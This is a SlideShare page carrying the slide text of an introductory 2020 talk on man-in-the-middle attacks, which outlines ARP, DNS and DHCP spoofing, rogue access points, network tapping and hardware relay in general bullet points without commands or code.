SlideShare a Scribd company logo

MITM: Tales of Trust and Betrayal

Download as PPTX, PDF
Satria Ady Pradana
Satria Ady Pradana

Man in the Middle, classic but still relevant. What is MITM? How to achieve it? What impact it have? Find out MITM in this presentation (Jakarta, 25/07/2020)

Technology
1 of 20
Man in the Middle TALES OF TRUST AND BETRAYAL Satria Ady Pradana2020
Hi! I am Satria Ady Pradana ◎ Cyber Security Consultant at Mitra Integrasi Informatika ◎ Community Leader of Reversing.ID ◎ R&D Member of Indonesia Honeynet Project ◎ Researcher xathrya @xathrya Reversing.ID Revealing the Truth through Breaking Things https://xathrya.id
Man in the Middle (MITM) Also known as: 1. Bucket-Brigade Attack 2. Eavesdropping MITM: TALES OF TRUST AND BETRAYAL 3
Man in the Middle (MITM) 1. Eavesdropping. 2. Positioning self between two communicating parties. 3. Able to monitor, relay, and possibly alter the messages. 4. (Usually) Tricking each parties, impersonate as the other side of communication. Using or act as proxy in the middle ground. MITM: TALES OF TRUST AND BETRAYAL 4
Man in the Middle (MITM) Derived from the basketball scenario. Two players intend to pass a ball to each other while one player between them tries to seize it. MITM: TALES OF TRUST AND BETRAYAL 5
Who Use MITM? 1. Hackers, attacking people in vicinity, to sniff or steals data. 2. Security researcher, targeting his own hardware or application, to learn the behavior. MITM: TALES OF TRUST AND BETRAYAL 6
Impact In most cases: 1. Credentials stolen. 2. Activity monitored. 3. Tamper messages. MITM: TALES OF TRUST AND BETRAYAL 7
Techniques MITM: TALES OF TRUST AND BETRAYAL 8
MITM: Types Based on Interactions 1. Passive 2. Active Based on Level of Proximity 1. Application Level 2. Network Level 3. Hardware Level MITM: TALES OF TRUST AND BETRAYAL 9 Based on Attacks 1. Rogue Access Point 2. Identity Spoofing
MITM: Passive 1. Quietly monitor messages. 2. Capturing information in transit without modify any part in any way. 3. Modifying the infrastructure, not the target. MITM: TALES OF TRUST AND BETRAYAL 10
Network Tapping 1. Introduce middle point in communication line. 2. Copy the messages in traffic. 3. No transit, no controlling flow. MITM: TALES OF TRUST AND BETRAYAL 11
Port Mirroring Also known as SPAN (Switched Port Analyzer) Feature of most enterprise-class switches (managed switches). Forward in/out traffic of specific port to other port. MITM: TALES OF TRUST AND BETRAYAL 12
MITM: Active 1. Periodically send requests. 2. Modify application or machine behavior to redirect messages. 3. Force request to transit to proxy, unbeknownst. MITM: TALES OF TRUST AND BETRAYAL 13
Application-Level MITM 1. Application to application communication. 2. Intercomponent communication. 3. Altering applications behavior. 4. Hooking functions. Example classes: 1. Man in The Browser MITM: TALES OF TRUST AND BETRAYAL 14
Network Level MITM Host to host communication. Techniques: 1. Rogue Access Point 2. ARP Spoofing 3. DNS Spoofing 4. DHCP Spoofing MITM: TALES OF TRUST AND BETRAYAL 15
Rogue Access Point 1. Pretend as legitimate Access Point. 2. Trick nearby devices to join. MITM: TALES OF TRUST AND BETRAYAL 16
ARP Spoofing 1. Address Resolution Protocol 1. Convert / map IP address into physical address (MAC). 2. Switch know MAC addresses, router know IP addresses. 2. Sent packets to modify ARP cache table. 1. Usually attacker imposing as gateway. MITM: TALES OF TRUST AND BETRAYAL 17
DNS Spoofing 1. Domain Name System 1. Convert domain name to IP address. 2. Machine use IP address fluently, human remember words better. 2. Send packets to corrupt and modify DNS cache information. 3. Usually sniffing ID of any DNS request and reply before the real DNS server. MITM: TALES OF TRUST AND BETRAYAL 18
DHCP Spoofing 1. Dynamic Host Configuration Protocol 1. Set up host IP address, gateway, DNS server, and subnet dynamically. 2. Give desired configuration to victim. 3. DHCP requests are made in broadcast mode. 4. Reply to machine DHCP requests before real DHCP server answer. 1. IP address of victim. 2. Gateway address assigned to MITM: TALES OF TRUST AND BETRAYAL 19
Hardware-Level MITM 1. Targeting contactless devices (proximity card, RFID, NFC, etc). 2. Commonly used to relay and replay messages. MITM: TALES OF TRUST AND BETRAYAL 20

Recommended

Man in the middle
Man in the middleMan in the middle
Man in the middle
AhmadThaqifAimanAhma
 
Man in-the-middle attack(http)
Man in-the-middle attack(http)Man in-the-middle attack(http)
Man in-the-middle attack(http)
Togis UAB Ltd
 
Man in-the-middle attack(http)
Man in-the-middle attack(http)Man in-the-middle attack(http)
Man in-the-middle attack(http)
Togis UAB Ltd
 
Unauthorized access, Men in the Middle (MITM)
Unauthorized access, Men in the Middle (MITM)Unauthorized access, Men in the Middle (MITM)
Unauthorized access, Men in the Middle (MITM)
Balvinder Singh
 
Man in the middle attack (mitm)
Man in the middle attack (mitm)Man in the middle attack (mitm)
Man in the middle attack (mitm)
Hemal Joshi
 
Module 6 Session Hijacking
Module 6 Session HijackingModule 6 Session Hijacking
Module 6 Session Hijacking
leminhvuong
 
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Syed Ubaid Ali Jafri
 
Man in The Middle Attack
Man in The Middle AttackMan in The Middle Attack
Man in The Middle Attack
Deepak Upadhyay
 

Recommended

Man in the middle
Man in the middleMan in the middle
Man in the middle
AhmadThaqifAimanAhma
 
Man in-the-middle attack(http)
Man in-the-middle attack(http)Man in-the-middle attack(http)
Man in-the-middle attack(http)
Togis UAB Ltd
 
Man in-the-middle attack(http)
Man in-the-middle attack(http)Man in-the-middle attack(http)
Man in-the-middle attack(http)
Togis UAB Ltd
 
Unauthorized access, Men in the Middle (MITM)
Unauthorized access, Men in the Middle (MITM)Unauthorized access, Men in the Middle (MITM)
Unauthorized access, Men in the Middle (MITM)
Balvinder Singh
 
Man in the middle attack (mitm)
Man in the middle attack (mitm)Man in the middle attack (mitm)
Man in the middle attack (mitm)
Hemal Joshi
 
Module 6 Session Hijacking
Module 6 Session HijackingModule 6 Session Hijacking
Module 6 Session Hijacking
leminhvuong
 
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Syed Ubaid Ali Jafri
 
Man in The Middle Attack
Man in The Middle AttackMan in The Middle Attack
Man in The Middle Attack
Deepak Upadhyay
 
Internet security
Internet securityInternet security
Internet security
gOhElprashanT
 
Internet security
Internet securityInternet security
Internet security
gohel
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Neel Kamal
 
Dos & Ddos Attack. Man in The Middle Attack
Dos & Ddos Attack. Man in The Middle AttackDos & Ddos Attack. Man in The Middle Attack
Dos & Ddos Attack. Man in The Middle Attack
marada0033
 
AN INTRODUCTION TO NETWORK ADDRESS SHUFFLING
AN INTRODUCTION TO NETWORK ADDRESS SHUFFLINGAN INTRODUCTION TO NETWORK ADDRESS SHUFFLING
AN INTRODUCTION TO NETWORK ADDRESS SHUFFLING
Sreelekshmi S
 
Network Security
Network SecurityNetwork Security
Network Security
Puneet Abichandani
 
DDoS ATTACKS
DDoS ATTACKSDDoS ATTACKS
DDoS ATTACKS
Anil Antony
 
IRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-AttackIRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-Attack
IRJET Journal
 
Network Security
Network SecurityNetwork Security
Network Security
GiftifyGiftify
 
ip spoofing by Ipshita Nandy
ip spoofing by Ipshita Nandy ip spoofing by Ipshita Nandy
ip spoofing by Ipshita Nandy
IpshitaNandy
 
IRJET- A Novel Survey on DOS Attacks
IRJET- A Novel Survey on DOS AttacksIRJET- A Novel Survey on DOS Attacks
IRJET- A Novel Survey on DOS Attacks
IRJET Journal
 
Information-Security-Lecture-7.pptx
Information-Security-Lecture-7.pptxInformation-Security-Lecture-7.pptx
Information-Security-Lecture-7.pptx
anbersattar
 
ip spoofing
ip spoofingip spoofing
ip spoofing
vipin soni
 
Anonymity in the Web based on Routing Protocols
Anonymity in the Web based on Routing ProtocolsAnonymity in the Web based on Routing Protocols
Anonymity in the Web based on Routing Protocols
Biagio Botticelli
 
Dash crypto
Dash cryptoDash crypto
Dash crypto
MohammadrezaTeymuri
 
Ip Spoofing
Ip SpoofingIp Spoofing
Ip Spoofing
arpit.arp
 
Anonymity in the web based on routing protocols
Anonymity in the web based on routing protocolsAnonymity in the web based on routing protocols
Anonymity in the web based on routing protocols
Biagio Botticelli
 
lab 5 chat gpt.docx
lab 5 chat gpt.docxlab 5 chat gpt.docx
lab 5 chat gpt.docx
ramakrishnagoriparth2
 
OWASP Top 10 - Insecure Communication
OWASP Top 10 - Insecure CommunicationOWASP Top 10 - Insecure Communication
OWASP Top 10 - Insecure Communication
Gayan Weerarathna
 
2 secure systems design
2 secure systems design2 secure systems design
2 secure systems design
drewz lin
 
Malware for Red Team
Malware for Red TeamMalware for Red Team
Malware for Red Team
Satria Ady Pradana
 
Down The Rabbit Hole, From Networker to Security Professional
Down The Rabbit Hole, From Networker to Security ProfessionalDown The Rabbit Hole, From Networker to Security Professional
Down The Rabbit Hole, From Networker to Security Professional
Satria Ady Pradana
 

More Related Content

Similar to MITM: Tales of Trust and Betrayal

Information-Security-Lecture-7.pptx
Information-Security-Lecture-7.pptxInformation-Security-Lecture-7.pptx
Information-Security-Lecture-7.pptx
anbersattar
 
2 secure systems design
2 secure systems design2 secure systems design
2 secure systems design
drewz lin
 

Similar to MITM: Tales of Trust and Betrayal (20)

Internet security
Internet securityInternet security
Internet security
 
Internet security
Internet securityInternet security
Internet security
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Dos & Ddos Attack. Man in The Middle Attack
Dos & Ddos Attack. Man in The Middle AttackDos & Ddos Attack. Man in The Middle Attack
Dos & Ddos Attack. Man in The Middle Attack
 
AN INTRODUCTION TO NETWORK ADDRESS SHUFFLING
AN INTRODUCTION TO NETWORK ADDRESS SHUFFLINGAN INTRODUCTION TO NETWORK ADDRESS SHUFFLING
AN INTRODUCTION TO NETWORK ADDRESS SHUFFLING
 
Network Security
Network SecurityNetwork Security
Network Security
 
DDoS ATTACKS
DDoS ATTACKSDDoS ATTACKS
DDoS ATTACKS
 
IRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-AttackIRJET- Security from Man-In-The-Middle-Attack
IRJET- Security from Man-In-The-Middle-Attack
 
Network Security
Network SecurityNetwork Security
Network Security
 
ip spoofing by Ipshita Nandy
ip spoofing by Ipshita Nandy ip spoofing by Ipshita Nandy
ip spoofing by Ipshita Nandy
 
IRJET- A Novel Survey on DOS Attacks
IRJET- A Novel Survey on DOS AttacksIRJET- A Novel Survey on DOS Attacks
IRJET- A Novel Survey on DOS Attacks
 
Information-Security-Lecture-7.pptx
Information-Security-Lecture-7.pptxInformation-Security-Lecture-7.pptx
Information-Security-Lecture-7.pptx
 
ip spoofing
ip spoofingip spoofing
ip spoofing
 
Anonymity in the Web based on Routing Protocols
Anonymity in the Web based on Routing ProtocolsAnonymity in the Web based on Routing Protocols
Anonymity in the Web based on Routing Protocols
 
Dash crypto
Dash cryptoDash crypto
Dash crypto
 
Ip Spoofing
Ip SpoofingIp Spoofing
Ip Spoofing
 
Anonymity in the web based on routing protocols
Anonymity in the web based on routing protocolsAnonymity in the web based on routing protocols
Anonymity in the web based on routing protocols
 
lab 5 chat gpt.docx
lab 5 chat gpt.docxlab 5 chat gpt.docx
lab 5 chat gpt.docx
 
OWASP Top 10 - Insecure Communication
OWASP Top 10 - Insecure CommunicationOWASP Top 10 - Insecure Communication
OWASP Top 10 - Insecure Communication
 
2 secure systems design
2 secure systems design2 secure systems design
2 secure systems design
 

More from Satria Ady Pradana

More from Satria Ady Pradana (20)

Malware for Red Team
Malware for Red TeamMalware for Red Team
Malware for Red Team
 
Down The Rabbit Hole, From Networker to Security Professional
Down The Rabbit Hole, From Networker to Security ProfessionalDown The Rabbit Hole, From Networker to Security Professional
Down The Rabbit Hole, From Networker to Security Professional
 
Berkarir di Cyber Security
Berkarir di Cyber SecurityBerkarir di Cyber Security
Berkarir di Cyber Security
 
IOT Security FUN-damental
IOT Security FUN-damentalIOT Security FUN-damental
IOT Security FUN-damental
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming Operation
 
IoT Security - Preparing for the Worst
IoT Security - Preparing for the WorstIoT Security - Preparing for the Worst
IoT Security - Preparing for the Worst
 
Silabus Training Reverse Engineering
Silabus Training Reverse EngineeringSilabus Training Reverse Engineering
Silabus Training Reverse Engineering
 
Practical Security - Modern Day Software
Practical Security - Modern Day SoftwarePractical Security - Modern Day Software
Practical Security - Modern Day Software
 
Firmware Reverse Engineering
Firmware Reverse EngineeringFirmware Reverse Engineering
Firmware Reverse Engineering
 
Reverse Engineering: The Crash Course
Reverse Engineering: The Crash CourseReverse Engineering: The Crash Course
Reverse Engineering: The Crash Course
 
The Offensive Python: Practical Python for Penetration Testing
The Offensive Python: Practical Python for Penetration TestingThe Offensive Python: Practical Python for Penetration Testing
The Offensive Python: Practical Python for Penetration Testing
 
From Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in EssenceFrom Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in Essence
 
Android Security: Art of Exploitation
Android Security: Art of ExploitationAndroid Security: Art of Exploitation
Android Security: Art of Exploitation
 
Bypass Security Checking with Frida
Bypass Security Checking with FridaBypass Security Checking with Frida
Bypass Security Checking with Frida
 
Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)Malware: To The Realm of Malicious Code (Training)
Malware: To The Realm of Malicious Code (Training)
 
Reverse Engineering: Protecting and Breaking the Software (Workshop)
Reverse Engineering: Protecting and Breaking the Software (Workshop)Reverse Engineering: Protecting and Breaking the Software (Workshop)
Reverse Engineering: Protecting and Breaking the Software (Workshop)
 
Reverse Engineering: Protecting and Breaking the Software
Reverse Engineering: Protecting and Breaking the SoftwareReverse Engineering: Protecting and Breaking the Software
Reverse Engineering: Protecting and Breaking the Software
 
Memory Forensic: Investigating Memory Artefact (Workshop)
Memory Forensic: Investigating Memory Artefact (Workshop)Memory Forensic: Investigating Memory Artefact (Workshop)
Memory Forensic: Investigating Memory Artefact (Workshop)
 
Memory Forensic: Investigating Memory Artefact
Memory Forensic: Investigating Memory ArtefactMemory Forensic: Investigating Memory Artefact
Memory Forensic: Investigating Memory Artefact
 
Another Side of Hacking
Another Side of HackingAnother Side of Hacking
Another Side of Hacking
 

Recently uploaded

TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc
 
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data PlatformLess Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
WSO2
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 

Recently uploaded (20)

AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
Modernizing Legacy Systems Using Ballerina
Modernizing Legacy Systems Using BallerinaModernizing Legacy Systems Using Ballerina
Modernizing Legacy Systems Using Ballerina
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data PlatformLess Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
 
Quantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation ComputingQuantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation Computing
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
 
Navigating Identity and Access Management in the Modern Enterprise
Navigating Identity and Access Management in the Modern EnterpriseNavigating Identity and Access Management in the Modern Enterprise
Navigating Identity and Access Management in the Modern Enterprise
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 

MITM: Tales of Trust and Betrayal

  • 1. Man in the Middle TALES OF TRUST AND BETRAYAL Satria Ady Pradana2020
  • 2. Hi! I am Satria Ady Pradana ◎ Cyber Security Consultant at Mitra Integrasi Informatika ◎ Community Leader of Reversing.ID ◎ R&D Member of Indonesia Honeynet Project ◎ Researcher xathrya @xathrya Reversing.ID Revealing the Truth through Breaking Things https://xathrya.id
  • 3. Man in the Middle (MITM) Also known as: 1. Bucket-Brigade Attack 2. Eavesdropping MITM: TALES OF TRUST AND BETRAYAL 3
  • 4. Man in the Middle (MITM) 1. Eavesdropping. 2. Positioning self between two communicating parties. 3. Able to monitor, relay, and possibly alter the messages. 4. (Usually) Tricking each parties, impersonate as the other side of communication. Using or act as proxy in the middle ground. MITM: TALES OF TRUST AND BETRAYAL 4
  • 5. Man in the Middle (MITM) Derived from the basketball scenario. Two players intend to pass a ball to each other while one player between them tries to seize it. MITM: TALES OF TRUST AND BETRAYAL 5
  • 6. Who Use MITM? 1. Hackers, attacking people in vicinity, to sniff or steals data. 2. Security researcher, targeting his own hardware or application, to learn the behavior. MITM: TALES OF TRUST AND BETRAYAL 6
  • 7. Impact In most cases: 1. Credentials stolen. 2. Activity monitored. 3. Tamper messages. MITM: TALES OF TRUST AND BETRAYAL 7
  • 8. Techniques MITM: TALES OF TRUST AND BETRAYAL 8
  • 9. MITM: Types Based on Interactions 1. Passive 2. Active Based on Level of Proximity 1. Application Level 2. Network Level 3. Hardware Level MITM: TALES OF TRUST AND BETRAYAL 9 Based on Attacks 1. Rogue Access Point 2. Identity Spoofing
  • 10. MITM: Passive 1. Quietly monitor messages. 2. Capturing information in transit without modify any part in any way. 3. Modifying the infrastructure, not the target. MITM: TALES OF TRUST AND BETRAYAL 10
  • 11. Network Tapping 1. Introduce middle point in communication line. 2. Copy the messages in traffic. 3. No transit, no controlling flow. MITM: TALES OF TRUST AND BETRAYAL 11
  • 12. Port Mirroring Also known as SPAN (Switched Port Analyzer) Feature of most enterprise-class switches (managed switches). Forward in/out traffic of specific port to other port. MITM: TALES OF TRUST AND BETRAYAL 12
  • 13. MITM: Active 1. Periodically send requests. 2. Modify application or machine behavior to redirect messages. 3. Force request to transit to proxy, unbeknownst. MITM: TALES OF TRUST AND BETRAYAL 13
  • 14. Application-Level MITM 1. Application to application communication. 2. Intercomponent communication. 3. Altering applications behavior. 4. Hooking functions. Example classes: 1. Man in The Browser MITM: TALES OF TRUST AND BETRAYAL 14
  • 15. Network Level MITM Host to host communication. Techniques: 1. Rogue Access Point 2. ARP Spoofing 3. DNS Spoofing 4. DHCP Spoofing MITM: TALES OF TRUST AND BETRAYAL 15
  • 16. Rogue Access Point 1. Pretend as legitimate Access Point. 2. Trick nearby devices to join. MITM: TALES OF TRUST AND BETRAYAL 16
  • 17. ARP Spoofing 1. Address Resolution Protocol 1. Convert / map IP address into physical address (MAC). 2. Switch know MAC addresses, router know IP addresses. 2. Sent packets to modify ARP cache table. 1. Usually attacker imposing as gateway. MITM: TALES OF TRUST AND BETRAYAL 17
  • 18. DNS Spoofing 1. Domain Name System 1. Convert domain name to IP address. 2. Machine use IP address fluently, human remember words better. 2. Send packets to corrupt and modify DNS cache information. 3. Usually sniffing ID of any DNS request and reply before the real DNS server. MITM: TALES OF TRUST AND BETRAYAL 18
  • 19. DHCP Spoofing 1. Dynamic Host Configuration Protocol 1. Set up host IP address, gateway, DNS server, and subnet dynamically. 2. Give desired configuration to victim. 3. DHCP requests are made in broadcast mode. 4. Reply to machine DHCP requests before real DHCP server answer. 1. IP address of victim. 2. Gateway address assigned to MITM: TALES OF TRUST AND BETRAYAL 19
  • 20. Hardware-Level MITM 1. Targeting contactless devices (proximity card, RFID, NFC, etc). 2. Commonly used to relay and replay messages. MITM: TALES OF TRUST AND BETRAYAL 20